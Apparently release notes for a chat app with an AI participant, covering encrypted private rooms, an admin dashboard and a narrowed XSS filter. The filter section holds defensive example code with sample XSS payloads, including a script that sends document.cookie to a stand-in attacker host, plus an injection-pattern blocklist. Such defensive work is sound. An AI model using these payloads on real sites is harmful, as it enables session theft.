Model and Token Upgrades
The AI model was switched from google/gemini-2.0-flash-001 to google/gemini-2.5-flash, and max_tokens was raised to 32,768 — enabling much longer, more detailed AI responses. The conversation context window was expanded to 40 messages.
XSS Filter Fix
The existing XSS filter was too aggressive: it rejected legitimate code pastes (multi-line strings, angle brackets in generic type annotations such as Map<string, number>). The filter was narrowed so it rejects only script-injection patterns rather than general code. A pattern check on input is a backstop, not the primary defense: user content still needs context-aware escaping when it is rendered, which is what keeps any paste, including ones a filter lets through, inert as HTML.
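As an added example (not the project's filter code), the following contrasts a blunt angle-bracket reject, which is the behaviour the notes describe as too aggressive, with a narrower check for script-injection patterns, and shows that HTML-escaping at render time is what actually neutralises a paste. The pattern list and the sample inputs are constructed for the example; they are an assumption about what "script injection patterns" covers, not the project's real list.

```javascript
// Added example, not the project's filter. Contrasts a blunt angle-bracket
// reject with a narrower script-pattern check, and shows render-time escaping.
// SCRIPT_PATTERNS is an assumed list, not the real one from the project.

const SCRIPT_PATTERNS = [
  /<\s*script\b/i,                     // <script ...> opening tag
  /<\s*\/\s*script\s*>/i,              // </script>
  /<[a-z][^>]*\son[a-z]+\s*=/i,        // inline handler inside a tag: <img onerror=...>
  /\bjavascript\s*:/i,                 // javascript: URLs in href/src
  /<\s*(iframe|object|embed)\b/i,      // tags that load active content
];

// Old behaviour: any angle bracket is treated as markup and rejected.
function blockedByBluntFilter(text) {
  return /[<>]/.test(text);
}

// Narrowed behaviour: reject only when a script-injection pattern is present.
function blockedByNarrowFilter(text) {
  return SCRIPT_PATTERNS.some((re) => re.test(text));
}

// Render-time escaping: whatever reached storage is displayed as text, not markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed inputs: a legitimate TypeScript paste and two classic payloads.
const TYPE_PASTE = [
  'const cache: Map<string, Array<number>> = new Map();',
  'if (a < b && c > d) {',
  '  return `<li>${item}</li>`;',
  '}',
].join('\n');
const IMG_PAYLOAD = '<img src=x onerror="alert(document.cookie)">';
const SCRIPT_PAYLOAD = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>';

// Run one input through both filters and the escaper.
function evaluate(text) {
  return {
    blunt: blockedByBluntFilter(text),    // true for the type paste: the false positive
    narrow: blockedByNarrowFilter(text),  // false for the type paste, true for the payloads
    rendered: escapeHtml(text),           // never contains a raw < or >
  };
}
```

Any blocklist has gaps (encoded variants, SVG and MathML vectors, attribute contexts), so the narrowed filter should be treated as a convenience for rejecting obvious junk; `escapeHtml` on output (or a sanitizer such as DOMPurify if rich content must be allowed) is the control to rely on.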
End-to-End Encryption (E2EE) for Private Rooms
Each private room can now be initialized with a shared AES-GCM key. The room key is generated client-side with the Web Crypto API, wrapped with each member's RSA-OAEP public key, and the wrapped copy is stored server-side per user. Messages in E2EE rooms are encrypted before they go over the wire; the server stores and relays ciphertext and, provided the public keys it hands out are genuinely the members' own, never sees plaintext.
- A "Leave Room" button was added alongside this to cleanly remove the local key material and socket subscription.
- The frontend persists the key in session storage so it survives refreshes within the same tab. Session storage is readable by any script running in the app's origin, so the key is only as private as the page is free of XSS.
- A lock-icon indicator in RoomSidebar shows E2EE status at a glance.
Admin Dashboard
/admin (protected route, owner-only) lists all users with their subscription tier, token usage, and account metadata. An upgrade button calls the existing admin endpoint to change a user's tier without touching the database directly. The route guard protects the UI; the owner check that matters is the one the admin endpoint itself performs on every request, since a client-side guard only hides the page.
Cortez E2EE Timeout Fix
Cortez (the AI participant) was returning empty replies due to a 504 timeout when decrypting large E2EE messages. The decryption path was made more defensive and the timeout extended.
Why it matters
E2EE is a meaningful trust differentiator: users can have genuinely private conversations that the platform operator cannot read. Rooms where Cortez participates are the exception, since the AI side must hold the room key to decrypt messages and reply, so in those rooms the privacy boundary is the AI service rather than the message relay. The admin dashboard made early-access user management tractable without SSH access.